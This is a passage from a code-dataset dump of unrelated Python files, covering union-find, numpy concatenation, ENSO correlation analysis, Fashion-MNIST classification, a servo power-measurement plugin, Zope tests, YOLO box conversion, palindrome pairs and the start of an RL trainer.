self.data[element_root] = to_element_root\n\n    def is_connected(self, element, to_element):\n        return self._get_root(element) == self._get_root(to_element)\n\n\nclass QuickUnionWeighted(QuickUnion):\n    def __init__(self, length):\n        super().__init__(length)\n        self.size_array = [1 for _ in range(length)]\n\n    def union(self, element, to_element):\n        element_root = self._get_root(element)\n        to_element_root = self._get_root(to_element)\n\n        if element_root == to_element_root:\n            return\n\n        if self.size_array[element_root] < self.size_array[to_element_root]:\n            self.data[element_root] = to_element_root\n            self.size_array[to_element_root] += self.size_array[element_root]\n        else:\n            self.data[to_element_root] = element_root\n            self.size_array[element_root] += self.size_array[to_element_root]\n\n\nif __name__ == \"__main__\":\n    def connectivity_scenario(find_object):\n        print('--- ' * 20)\n        print(f'Scenario for {find_object.__class__.__name__}')\n        print('--- ' * 20)\n        find_object.show_connection(0, 3)\n\n        find_object.union(0, 3)\n        find_object.show_connection(0, 3)\n\n        find_object.drop(find_object)\n        find_object.show_connection(0, 3)\n\n        find_object.union(0, 3)
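\n        # Note (added): drop() resets the structure, so this union re-links ids 0 and 3;\n        # the unions below then merge {0, 3, 4, 5}, and show_connection(5, 4) should report True.\n        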
print(find_object)\n        find_object.union(0, 4)\n        print(find_object)\n        find_object.union(3, 5)\n        print(find_object)\n        find_object.union(9, 1)\n        print(find_object)\n        find_object.show_connection(5, 4)\n        print('--- ' * 20)\n\n    connectivity_scenario(find_object=QuickFind(length=10))\n    connectivity_scenario(find_object=QuickUnion(length=10))\n    connectivity_scenario(find_object=QuickUnionWeighted(length=10))\n","sub_path":"education_part/connectivity/connectivity.py","file_name":"connectivity.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"532298583","text":"import numpy as np\na = np.array([[1, 2], [3, 4]]) \nb = np.array([[5, 6]])\nprint(np.concatenate((a, b), axis=0)) # axis=0 concatenates along rows\n'''\narray([[1, 2],\n       [3, 4],\n       [5, 6]])\n'''\nc = np.array([[1, 2], [3, 4]]) \nd = np.array([[5, 6]])\nprint(np.concatenate((c, d.T), axis=1)) # axis=1 concatenates along columns\n'''\narray([[1, 2, 5],\n       [3, 4, 6]])\n'''\n","sub_path":"lib/basics/concatenate用法.py","file_name":"concatenate用法.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"96421604","text":"#correlations of extratropical asymmetries and computation of asymmetric index\nimport numpy as np\nimport xarray as xr\nimport os\n\ndef TestCorrelation(var1, var2, var3, var4):\n\tvarx = np.mean(var1, axis=0) - np.mean(var2, axis=0)\n\tvary = np.mean(var3, axis=0) - np.mean(var4, axis=0)\n\tvarx = np.ravel(varx)\n\tvary = np.ravel(vary)\n\tcorrelacion = np.corrcoef(varx, vary)[0, 1]\n\treturn correlacion\ndef ComputeAsymmetry(field, pattern):\n\t\"\"\"project pattern onto field\"\"\"\n\tpattern = np.ravel(pattern)\n\tpattern = pattern #/ np.sqrt(np.sum(pattern * pattern))\n\tpattern = np.tile(pattern[np.newaxis, :], (field.shape[0], 1))\n\tfield = np.reshape(field,[field.shape[0], field.shape[1]*field.shape[2]])\n\tfield_norm = np.reshape(np.tile((np.sum(field * field, axis=1)), (1, field.shape[1])),\n\t\t\t\t[field.shape[0], field.shape[1]])\n\tprint(field_norm.shape)\n#\tfield_norm = \n\tindex = np.squeeze(np.sum(field /field_norm * pattern, axis=1))\n\treturn index\n#================================================\nos.environ['HDF5_USE_FILE_LOCKING'] = 'FALSE'\nPATH_DATA = '~/datos/data/'\nPATH_DATA_2 = '/home/users/vg140344/datos/data/fogt/'\nFIG_PATH = '/home/users/vg140344/assessment_SH_zonal_asymmetries/figures/strat_trop_zonal_asymmetries/decile_new/'\nFILE_HGT_S4 = 'monthly_hgt200_aug_feb.nc4'\nFILE_NINIO_S4 = 'fogt/ninio34_monthly.nc4'\nFILE_PV_S4 = 'fogt/SPV_index.nc4'\nhgt = xr.open_dataset(PATH_DATA + FILE_HGT_S4)\nhgt = hgt - hgt.mean(dim='longitude')\nhgt = hgt.sel(**{'latitude':slice(-45, -90)})\nninio34 = xr.open_dataset(PATH_DATA + FILE_NINIO_S4)\nPV_index = xr.open_dataset(PATH_DATA + FILE_PV_S4)\n\n#search for years with weak PV\nindex_SPV_upper = PV_index.SPV_index >= PV_index.SPV_index.quantile(0.90, dim='dim_0', interpolation='linear')\n#search for years with strong PV\nindex_SPV_lower = PV_index.SPV_index <= PV_index.SPV_index.quantile(0.10, dim='dim_0', interpolation='linear')\n\n#enso during all years\nindex_ninio_all = ninio34.ninio34_index >= ninio34.ninio34_index.quantile(0.90, dim='dim_0', interpolation='linear')\nindex_ninia_all = ninio34.ninio34_index <= ninio34.ninio34_index.quantile(0.10, dim='dim_0', interpolation='linear')\nindex_normal_all = np.logical_and(ninio34.ninio34_index < ninio34.ninio34_index.quantile(0.90, dim='dim_0', 
interpolation='linear'), ninio34.ninio34_index > ninio34.ninio34_index.quantile(0.10, dim='dim_0', interpolation='linear'))\n#enso during weak PoV\n\nindex_ninio_WPV = np.logical_and(index_ninio_all.values, index_SPV_upper.values)\nindex_ninia_WPV = np.logical_and(index_ninia_all.values, index_SPV_upper.values)\nindex_normal_WPV = np.logical_and(index_normal_all.values, index_SPV_upper.values)\n\n#enso during strong PoV\nindex_ninio_SPV = np.logical_and(index_ninio_all.values, index_SPV_lower.values)\nindex_ninia_SPV = np.logical_and(index_ninia_all.values, index_SPV_lower.values)\nindex_normal_SPV = np.logical_and(index_normal_all.values, index_SPV_lower.values)\n\ncorrel_ninio_WPV = np.empty([7])\ncorrel_ninia_WPV = np.empty([7])\ncorrel_ninio_SPV = np.empty([7])\ncorrel_ninia_SPV = np.empty([7])\ncorrel_ninia = np.empty([7])\ncorrel_ninio = np.empty([7])\n\nmonth = ['Aug', 'Sep', 'Oct', 'Nov', 'Dec', 'Jan', 'Feb']\nseas = ['ASO', 'SON', 'OND', 'NDJ', 'DJF']\n\nfor i in np.arange(0, 7):\n\tvar_ninio_WPV = hgt.z.values[i, index_ninio_WPV, :, :]\n\tvar_normal_WPV = hgt.z.values[i, index_normal_WPV, :, :]\n\tvar_ninia_WPV = hgt.z.values[i, index_ninia_WPV, :, :]\t\n\tvar_ninio_SPV = hgt.z.values[i, index_ninio_SPV, :, :]\n\tvar_normal_SPV = hgt.z.values[i, index_normal_SPV, :, :]\n\tvar_ninia_SPV = hgt.z.values[i, index_ninia_SPV, :, :]\t\n\tvar_ninio_all = hgt.z.values[i, index_ninio_all.values, :, :]\n\tvar_normal_all = hgt.z.values[i, index_normal_all.values, :, :]\n\tvar_ninia_all = hgt.z.values[i, index_ninia_all.values, :, :]\n\tnp.savez(PATH_DATA_2 + 'z200_conditioned_' + month[i] + '_d_new.npz', var1=hgt.z.values[i, index_ninio_all.values, :, :], var2=hgt.z.values[i, index_normal_all.values, :, :], var3=hgt.z.values[i, index_ninia_all.values, :, :], var4=hgt.z.values[i, index_ninio_WPV, :, :], var5=hgt.z.values[i, index_normal_WPV, :, :], var6=hgt.z.values[i, index_ninia_WPV, :, :], var7=hgt.z.values[i, index_ninio_SPV, :, :], var8=hgt.z.values[i, index_normal_SPV, :, :], var9=hgt.z.values[i, index_ninia_SPV, :, :])\n\n#test whether the fields differ:\n\t#test correlation\n\tcorrel_ninio_WPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_WPV, var_normal_WPV)\n\tcorrel_ninia_WPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninia[i] = TestCorrelation(var_ninia_SPV, var_normal_SPV, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninio[i] = TestCorrelation(var_ninio_SPV, var_normal_SPV, var_ninio_WPV, var_normal_WPV)\n\tcorrel_ninio_SPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_SPV, var_normal_SPV)\n\tcorrel_ninia_SPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_SPV, var_normal_SPV)\n\nds = xr.Dataset({'correl_ninio_WPV': (['month'], correl_ninio_WPV),\n\t\t 'correl_ninia_WPV': (['month'], correl_ninia_WPV),\n\t\t 'correl_ninio_SPV': (['month'], correl_ninio_SPV),\n\t\t 'correl_ninia_SPV': (['month'], correl_ninia_SPV),\n\t\t 'correl_ninia': (['month'], correl_ninia),\n\t\t 'correl_ninio': (['month'], correl_ninio)},\n\t\t coords={'month': (['month'], month)})\nds.to_netcdf(PATH_DATA_2 + 'monthly_correlations_enso_SPoV_polar_d_new.nc4')\n\ncorrel_ninio_WPV = np.empty([5])\ncorrel_ninia_WPV = np.empty([5])\ncorrel_ninio_SPV = np.empty([5])\ncorrel_ninia_SPV = np.empty([5])\ncorrel_ninio = np.empty([5])\ncorrel_ninia = np.empty([5])\n\nfor i in np.arange(0, 5):\n\thgt_s = hgt.isel(month=range(i, i+3)).mean(dim='month')\n\tvar_ninio_WPV = hgt_s.z.values[index_ninio_WPV, :, :]
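\n\t# (added note) hgt_s above is a three-month seasonal mean, matching the labels in seas ('ASO' ... 'DJF')\n\tvar_normal_WPV 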
= hgt_s.z.values[index_normal_WPV, :, :]\n\tvar_ninia_WPV = hgt_s.z.values[index_ninia_WPV, :, :]\t\n\tvar_ninio_SPV = hgt_s.z.values[index_ninio_SPV, :, :]\n\tvar_normal_SPV = hgt_s.z.values[index_normal_SPV, :, :]\n\tvar_ninia_SPV = hgt_s.z.values[index_ninia_SPV, :, :]\t\n\tvar_ninio_all = hgt_s.z.values[index_ninio_all.values, :, :]\n\tvar_normal_all = hgt_s.z.values[index_normal_all.values, :, :]\n\tvar_ninia_all = hgt_s.z.values[index_ninia_all.values, :, :]\n\n\t#save npz file to compute correlations\n\tnp.savez(PATH_DATA_2 + 'z200_conditioned_' + seas[i] + '_d_new.npz', var1=hgt_s.z.values[index_ninio_all.values, :, :], var2=hgt_s.z.values[index_normal_all.values, :, :], var3=hgt_s.z.values[index_ninia_all.values, :, :], var4=hgt_s.z.values[index_ninio_WPV, :, :], var5=hgt_s.z.values[index_normal_WPV, :, :], var6=hgt_s.z.values[index_ninia_WPV, :, :], var7=hgt_s.z.values[index_ninio_SPV, :, :], var8=hgt_s.z.values[index_normal_SPV, :, :], var9=hgt_s.z.values[index_ninia_SPV, :, :])\n\t#test correlation\n\tcorrel_ninio_WPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_WPV, var_normal_WPV)\n\tcorrel_ninia_WPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninio_SPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_SPV, var_normal_SPV)\n\tcorrel_ninia_SPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_SPV, var_normal_SPV)\n\tcorrel_ninia[i] = TestCorrelation(var_ninia_SPV, var_normal_SPV, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninio[i] = TestCorrelation(var_ninio_SPV, var_normal_SPV, var_ninio_WPV, var_normal_WPV)\n\n\n\nds = xr.Dataset({'correl_ninio_WPV': (['seas'], correl_ninio_WPV),\n\t\t 'correl_ninia_WPV': (['seas'], correl_ninia_WPV),\n\t\t 'correl_ninio_SPV': (['seas'], correl_ninio_SPV),\n\t\t 'correl_ninia_SPV': (['seas'], correl_ninia_SPV),\n\t\t 'correl_ninia': (['seas'], correl_ninia),\n\t\t 'correl_ninio': (['seas'], correl_ninio)},\n\t\t coords={'seas': (['seas'], seas)})\nds.to_netcdf(PATH_DATA_2 + 'seasonal_correlations_enso_SPoV_polar_d_new.nc4')\n\n\n\n","sub_path":"strat_trop_zonal_asymmetries/decile/asymmetric_index_z200_new.py","file_name":"asymmetric_index_z200_new.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"561830877","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.datasets import fashion_mnist\r\nimport pandas as pd\r\n#load the data sheet\r\n(xtrain,ytrain),(xtest,ytest)=fashion_mnist.load_data()\r\nfashion_labels=[\"T-shirt/top\",\"Trousers\",\"Pullover\",\"Dress\",\"Coat\",\"Sandal\",\"Shirt\",\"Sneaker\",\"Bag\",\"Ankle boot\"]\r\nbatch_size=128\r\nepochs=3\r\nn_classes=10\r\nwidth=28\r\nheight=28\r\n#normalize the features for better training\r\nxtrain=xtrain.astype('float32')/255.0\r\nxtest=xtest.astype('float32')/255.0\r\n#flatten the features to feed the training algorithm\r\nxtrain=xtrain.reshape((60000,width*height))\r\nxtest=xtest.reshape((10000,width*height))\r\n#print(xtrain,xtest)\r\nsplit=50000\r\n#split the training set into training and validation sets\r\n(xtrain,xvalid)=xtrain[:split],xtrain[split:]\r\n(ytrain,yvalid)=ytrain[:split],ytrain[split:]\r\nytrain_ohe=tf.one_hot(ytrain,depth=n_classes).numpy()\r\nyvalid_ohe=tf.one_hot(yvalid,depth=n_classes).numpy()\r\nytest_ohe=tf.one_hot(ytest,depth=n_classes).numpy()\r\n#plot images\r\n_,image=plt.subplots(1,10,figsize=(8,1))\r\nfor i 
in range(10):\r\n    image[i].imshow(np.reshape(xtrain[i],(width,height)),cmap=\"Greys\")\r\n    print(fashion_labels[ytrain[i]],sep=\"\",end=\"\")\r\nplt.show()\r\n#build the model \r\nmodel=tf.keras.models.Sequential(\\\r\n[tf.keras.layers.Dense(n_classes,activation='softmax')] )\r\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\r\n#loss function=cross entropy (not sure )\r\n#the accuracy metric is the normal standard for error rate\r\nmodel.fit(xtrain,ytrain_ohe,batch_size=batch_size,epochs=epochs,validation_data=(xvalid,yvalid_ohe))\r\nmodel.summary()\r\n\r\n\r\n# evaluate the model on the test set\r\nscores = model.evaluate(xtest, ytest_ohe, batch_size)\r\nprint(\"Final test loss and accuracy :\", scores)\r\ny_predictions = model.predict(xtest)\r\n# example of one predicted versus one true fashion label\r\nindex = 42\r\nindex_predicted = np.argmax(y_predictions[index]) # index of the class the model predicts\r\n# largest label probability\r\nindex_true = np.argmax(ytest_ohe[index])\r\n# pick out index of element with a 1 in it\r\nprint(\"When prediction is \" , index_predicted)\r\nprint(\"ie. predicted label is\",\r\nfashion_labels[index_predicted])\r\nprint(\"True label is \", fashion_labels[index_true])\r\nprint (\"\\n\\nPredicted V (True) fashion labels,\\\r\ngreen is correct, red is wrong\")\r\nsize = 12 # 12 random numbers out of x_test.shape[0]\r\nfig = plt.figure(figsize=(15,3))\r\nrows = 3\r\ncols = 4\r\nfor i, index in enumerate(np.random.choice(\\\r\n    xtest.shape[0], size = size, replace = False)):\r\n    axis=fig.add_subplot(rows,cols,i+1)\r\n    # position i+1 in grid with rows rows and cols columns\r\n    axis.imshow(xtest[index].reshape(width,height),cmap=\"Greys\")\r\n    index_predicted = np.argmax(y_predictions[index])\r\n    index_true = np.argmax(ytest_ohe[index])\r\n    axis.set_title((\"{} ({})\").format(\\\r\n    fashion_labels[index_predicted],fashion_labels[index_true]),\r\n    color=(\"green\" if index_predicted == index_true else \"red\"))\r\nplt.show()","sub_path":"10multiclass_logistic-regression.py","file_name":"10multiclass_logistic-regression.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"278294923","text":"# Copyright 2015 MediaTek Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport time\nimport subprocess\nimport sys\nimport xmlrpclib\nfrom subprocess import Popen, PIPE\nfrom threading import Thread\n\nfrom wlauto import Instrument, Executable, Parameter\nfrom wlauto.exceptions import ConfigError\nfrom wlauto.utils.misc import ensure_file_directory_exists as _f\nfrom wlauto.utils.types import arguments, list_of_strs\n\nfrom Queue import Queue, Empty\n\nclass ServoInstrument(Instrument):\n    \"\"\" \n    Measure power consumption with chromium servo board\n    \"\"\"\n\n    name = 'servo'\n    description = 'chromium servo board'\n\n    parameters = [\n        Parameter('servod_host', kind=str, default='localhost',\n                  global_alias='servo_servod_host',\n                  description=\"\"\"hostname of 
the servod running\"\"\"),\n Parameter('servod_port', kind=str, default='9999',\n global_alias='servo_servod_port',\n description=\"\"\"port number of the servod running\"\"\"),\n Parameter('delay', kind=float, default=0.2,\n global_alias='servo_delay',\n description=\"\"\"delay before getting values\"\"\"),\n Parameter('power_for_little', kind=list_of_strs,\n default=['dvfs2_mw', 'sram15_mw'],\n global_alias='servo_power_for_little',\n description=\"\"\"names of power meters for little cluster\"\"\"),\n Parameter('power_for_big', kind=list_of_strs,\n default=['dvfs1_mw', 'sram7_mw'],\n global_alias='servo_power_for_big',\n description=\"\"\"names of power meters for big cluster\"\"\"),\n ]\n\n def initialize(self, context):\n self.start_time = None\n self.end_time = None\n self.proxy = xmlrpclib.ServerProxy(\"http://\" +\n\t\tself.servod_host + \":\" + self.servod_port + \"/\")\n\n def setup(self, context):\n pass\n\n def enqueue_output(self, queue):\n little_p = big_p = 0\n time.sleep(self.delay)\n\n for l in self.power_for_little:\n little_p += float(self.proxy.get(l))\n\n for b in self.power_for_big:\n big_p += float(self.proxy.get(b))\n\n queue.put(little_p)\n queue.put(big_p)\n\n def get_power(self):\n q = Queue()\n t = Thread(target=self.enqueue_output, args=[q])\n t.daemon = True # thread dies with the program\n t.start()\n return q\n\n def fast_start(self, context):\n self.start_time = time.time()\n self.q = self.get_power()\n self.start_a53_power = 0\n self.start_a72_power = 0\n\n def fast_stop(self, context):\n self.end_time = time.time()\n self.start_a53_power = self.q.get_nowait()\n self.start_a72_power = self.q.get_nowait()\n\n def update_result(self, context):\n power_consumed = self.end_time - self.start_time\n context.result.add_metric('a53_power', self.start_a53_power, 'milliwatts')\n context.result.add_metric('a72_power', self.start_a72_power, 'milliwatts')\n\n def teardown(self, context):\n pass\n\n def finalize(self, context):\n pass\n","sub_path":"wlauto/instrumentation/servo_board/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"74211680","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Onlinehelp tree view Tests\n\n$Id$\n\"\"\"\nimport os\n\nfrom unittest import TestCase, TestLoader, TextTestRunner\n\nfrom zope import component\nfrom zope.pagetemplate.tests.util import check_xml\nfrom zope.publisher.browser import TestRequest\nfrom zope.app.component.testing import PlacefulSetup\nfrom zope.app.onlinehelp.tests import util\nfrom zope.app.onlinehelp.interfaces import IOnlineHelp, IOnlineHelpTopic\nfrom zope.app.onlinehelp.onlinehelp import OnlineHelp\nfrom zope.app.onlinehelp.onlinehelptopic import OnlineHelpTopic\nfrom zope.app.onlinehelp.browser.tree import OnlineHelpTopicTreeView\n\n\ndef testdir():\n    import zope.app.onlinehelp.tests\n    return os.path.dirname(zope.app.onlinehelp.tests.__file__)\n\n\nclass TestOnlineHelpTopicTreeView(PlacefulSetup, TestCase):\n    \n    def setUp(self):\n        PlacefulSetup.setUp(self, site=True)\n        path = os.path.join(testdir(), 'help.txt')\n        self.onlinehelp = OnlineHelp('Help', path)\n        component.provideUtility(self.onlinehelp, IOnlineHelp, \"OnlineHelp\")\n\n    def test_onlinehelp(self):\n        view = OnlineHelpTopicTreeView\n        treeView = view(self.rootFolder, TestRequest()).getTopicTree\n        check_xml(treeView(), util.read_output('test1.xml'))\n\n    def test_topics(self):\n        path = os.path.join(testdir(), 'help.txt')\n        \n        id = 'topic1'\n        title = 'Topic1'\n        parentPath = \"\"\n        topic1 = OnlineHelpTopic(id, title, path, parentPath)\n        self.onlinehelp['topic1'] = topic1\n\n        id = 'topic1_1'\n        title = 'Topic1_1'\n        parentPath = 'topic1'\n        topic1_1 = OnlineHelpTopic(id, title, path, parentPath)\n        topic1['topic1_1'] = topic1_1\n\n        id = 'topic1_1_1'\n        title = 'Topic1_1_1'\n        parentPath = 'topic1/topic1_1'\n        topic1_1_1 = OnlineHelpTopic(id, title, path, parentPath)\n        topic1_1['topic1_1_1'] = topic1_1_1\n\n        id = 'topic2'\n        title = 'Topic2'\n        parentPath = \"\"\n        topic2 = OnlineHelpTopic(id, title, path, parentPath)\n        self.onlinehelp['topic2'] = topic2\n        \n        view = OnlineHelpTopicTreeView\n        treeView = view(self.rootFolder, TestRequest()).getTopicTree\n        check_xml(treeView(), util.read_output('test2.xml'))\n\n\ndef test_suite():\n    loader = TestLoader()\n    return loader.loadTestsFromTestCase(TestOnlineHelpTopicTreeView)\n\nif __name__=='__main__':\n    TextTestRunner().run(test_suite())\n","sub_path":"zope.app.onlinehelp/branches/3.5/src/zope/app/onlinehelp/tests/test_treeview.py","file_name":"test_treeview.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"344746736","text":"# Input: target channel N, number of broken buttons M, and the broken buttons themselves\n# Output: the minimum number of button presses needed to reach channel N\n# The starting channel is 100, so it seems we just need the minimum difference... 
but how many cases are there..?\n\nimport sys\n\nsys.stdin = open('input.txt', 'r')\n\nN = int(input())\nM = int(input())\n\ntotal_buttons = set(str(i) for i in range(0, 10))\nbroken_buttons = set(input().split())\n","sub_path":"PYTHON/BAEKJOON/1107_리모컨/X_1107.py","file_name":"X_1107.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"40398496","text":"import re\nimport os\n\n\ndef get_files_in_dir(basepath,ext=[],debug=False):\n\n    basepath=os.path.abspath(basepath)\n\n    ext = [str.lower(x) for x in ext]\n\n    try:\n        if os.path.exists(basepath) and os.path.isdir(basepath):\n            result=[os.path.join(basepath,x) for x in os.listdir(basepath)]\n            files=[x for x in result if os.path.isfile(x)]\n            if len(ext)==0:\n                print('无类型筛选,返回所有文件')\n                if debug:print(files)\n                return files\n\n            if len(ext)>0 :\n                print('返回{}类型的文件'.format(ext))\n                files=[x for x in files if str.lower(re.split(r'\\.',x)[-1]) in ext]\n                if debug:print(files)\n                return files\n        else:\n            return False\n    except Exception as e:\n        print('发生错误{}'.format(e))\n\n\n\n\ndef convert_xy_to_yolo(x_min,y_min,x_max,y_max,w_image,h_image):\n    x_yolo = ((x_min + x_max) / 2 - 1) / w_image\n    y_yolo = ((y_min + y_max) / 2 - 1) / h_image\n    w_yolo = (x_max - x_min) / w_image\n    h_yolo = (y_max - y_min) / h_image\n    return x_yolo,y_yolo,w_yolo,h_yolo\n\ndef convert_yolo_to_xy(x_yolo,y_yolo,w_yolo,h_yolo,image_w,image_h):\n\n    xmin = float(x_yolo) - float(w_yolo) / 2\n    xmax = float(x_yolo) + float(w_yolo) / 2\n\n    ymin = float(y_yolo) - float(h_yolo) / 2\n    ymax = float(y_yolo) + float(h_yolo) / 2\n\n    # map the normalized (0-1) values back to actual pixel coordinates in the image\n    xmin, xmax = int(image_w * xmin), int(image_w * xmax)\n    ymin, ymax = int(image_h * ymin), int(image_h * ymax)\n    return xmin, ymin, xmax, ymax\n\ndef get_yolo_data_from_file(file_path):\n    '''\n    Generator; iterate over it with a for loop.\n    @param file_path:\n    @return:\n    '''\n    with open(file_path,'r',encoding='utf-8') as f:\n        while 1:\n            s=f.readline()\n            if s=='':\n                break\n            else:\n                tag, x_yolo, y_yolo, w_yolo, h_yolo = [float(x) for x in s.split(' ')]\n                yield int(tag),float(x_yolo),float(y_yolo),float(w_yolo),float(h_yolo)\n\nfor i in get_yolo_data_from_file('E:\\yoloxml/mars_0.txt'):\n    print(*i)","sub_path":"my_model/yolo-xml转换.py","file_name":"yolo-xml转换.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"142318480","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/6/23 PM12:11\n# @Author : Qiming Zhang\n# @File : PalindromePairs\n# Use a dict to map each word -> its index\n\n# Iterate over the word list; let word be the current word and idx its index:\n\n# 1) If word is itself a palindrome and words contains the empty string, add (empty-string index, idx) to the answer\n\n# 2) If the reverse of word is in words, add (idx, index of the reverse) to the answer
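\n\n# (added example) with words = [\"bat\", \"tab\", \"cat\"] the answer is [[0, 1], [1, 0]], since \"battab\" and \"tabbat\" are both palindromes\n\n# 3) 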
Split the current word into left and right halves left, right.\n\n# 3.1) If left is a palindrome and the reverse of right is in words, add (index of reversed right, idx) to the answer\n\n# 3.2) If right is a palindrome and the reverse of left is in words, add (idx, index of reversed left) to the answer\nclass Solution(object):\n    def palindromePairs(self, words):\n        \"\"\"\n        :type words: List[str]\n        :rtype: List[List[int]]\n        \"\"\"\n        def isPalindrome(s):\n            return s == s[::-1]\n        dic = {y: x for x, y in enumerate(words)}\n        res = []\n        l = len(words)\n        for i in range(l):\n            word = words[i]\n            if word != \"\" and isPalindrome(word):\n                if \"\" in dic:\n                    res.append([dic[\"\"], i])\n                    res.append([i, dic[\"\"]])\n            rev = word[::-1]\n            if rev in dic and i != dic[rev]:\n                res.append([i, dic[rev]])\n            for x in range(1, len(word)):\n                left, right = word[:x], word[x:]\n                leftr, rightr = left[::-1], right[::-1]\n                if isPalindrome(left) and rightr in dic:\n                    res.append([dic[rightr], i])\n                if isPalindrome(right) and leftr in dic:\n                    res.append([i, dic[leftr]])\n        return res\n\n","sub_path":"String/PalindromePairs.py","file_name":"PalindromePairs.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"641617859","text":"from collections import OrderedDict\nimport pickle\nimport os\nimport sys\nimport time\n\nimport gym\nfrom gym import wrappers\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nimport core.pytorch_util as ptu\nimport core.utils\nfrom core.logger import Logger\n\nfrom dqn_agent import DQNAgent\nfrom core.dqn_utils import (\n    get_wrapper_by_name,\n    register_custom_envs\n)\n\n\n# how many rollouts to save as videos to tensorboard\nMAX_NVIDEO = 2\nMAX_VIDEO_LEN = 40 # we overwrite this in the code below\n\n\nclass RL_Trainer(object):\n\n    def __init__(self, params):\n\n        #############\n        ## INIT\n        #############\n\n        # Get params, create logger\n        self.params = params\n        # Set random seeds\n        seed = self.params['seed']\n        np.random.seed(seed)\n        torch.manual_seed(seed)\n        ptu.init_gpu(\n            use_gpu=not self.params['no_gpu'],\n            gpu_id=self.params['which_gpu']\n        )\n\n        #############\n        ## ENV\n        #############\n\n        # Make the gym environment\n        register_custom_envs()\n        self.env = gym.make(self.params['env_name'])\n        if ('Pointmass' in self.params['env_name']):\n            import matplotlib\n            matplotlib.use('Agg')\n            self.env.set_logdir(self.params['logdir'] + '/expl_')\n            #self.eval_env.set_logdir(self.params['logdir'] + '/eval_')\n\n        if 'env_wrappers' in self.params:\n            self.env = wrappers.Monitor(self.env, os.path.join(self.params['logdir']), force=True)\n            self.mean_episode_reward = -float('nan')\n            self.best_mean_episode_reward = -float('inf')\n        \n        self.env.seed(seed)\n        \n        # Observation and action sizes\n        ob_dim = self.env.observation_space.shape[0] # #if img else self.env.observation_space.shape[0]\n        ac_dim = self.env.action_space.n\n        print(\"ob_dim = {}, ac_dim = {}\".format(self.env.observation_space, ac_dim))\n        self.params['agent_params']['ac_dim'] = ac_dim\n        self.params['agent_params']['ob_dim'] = ob_dim\n        \n        #############\n        ## AGENT\n        #############\n\n        agent_class = self.params['agent_class']\n        self.agent = agent_class(self.env, self.params['agent_params'])\n\n    def run_training_loop(self, n_iter, collect_policy, eval_policy):\n        \n        \"\"\"\n        :param n_iter: number of (dagger) iterations\n        :param collect_policy:\n        :param eval_policy:\n        \"\"\"\n\n        # init vars at beginning of training\n        self.total_envsteps = 0\n        self.start_time = time.time()\n\n        print_period = self.params['scalar_log_freq']
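\n        # (added note) this loop takes a single env step per iteration (see step_env\n        # below), so n_iter effectively counts environment steps rather than batches\n        for itr in tqdm(range(n_iter)):\n            if itr % print_period == 0:\n                print(\"\\n********** 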
